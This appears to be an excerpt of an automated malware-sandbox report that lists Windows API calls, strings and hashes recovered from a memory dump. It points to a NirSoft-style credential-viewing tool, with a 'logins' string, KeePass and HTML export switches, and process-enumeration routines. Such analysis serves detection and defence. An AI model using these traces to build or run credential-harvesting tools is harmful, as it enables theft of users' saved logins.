                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                    • String ID: logins$null
                                                                                                                                                                                    • API String ID: 2148543256-2163367763
                                                                                                                                                                                    • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID: ---
                                                                                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                                                                                    • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1010922700-0
                                                                                                                                                                                    • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                    • free.MSVCRT ref: 004186C7
                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                    • free.MSVCRT ref: 004186E0
                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                    • free.MSVCRT ref: 00418716
                                                                                                                                                                                    • free.MSVCRT ref: 0041872A
                                                                                                                                                                                    • free.MSVCRT ref: 00418749
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                    • API String ID: 3356672799-1717621600
                                                                                                                                                                                    • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                    • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                                                    • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                    • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                                                                                    • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                    • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                    • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                    • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                    • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                    • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                      • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                      • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                    • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
• Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
• Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
• Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
• Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
• Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
• Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
• Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Strings
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
• Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
• Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
• Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
• Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
APIs
Strings
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
• Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
• Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
• Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
• Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Strings
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
• Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
• Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Strings
Similarity
• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
• API String ID: 973020956-4135340389
• Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
• Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
• Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
• Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
APIs
Strings
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                    • API String ID: 1283228442-2366825230
                                                                                                                                                                                    • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                    • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
• wcscat.MSVCRT ref: 00413A27
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
• Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
• Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
• Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
• Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
• Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
• Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
• Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
• Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
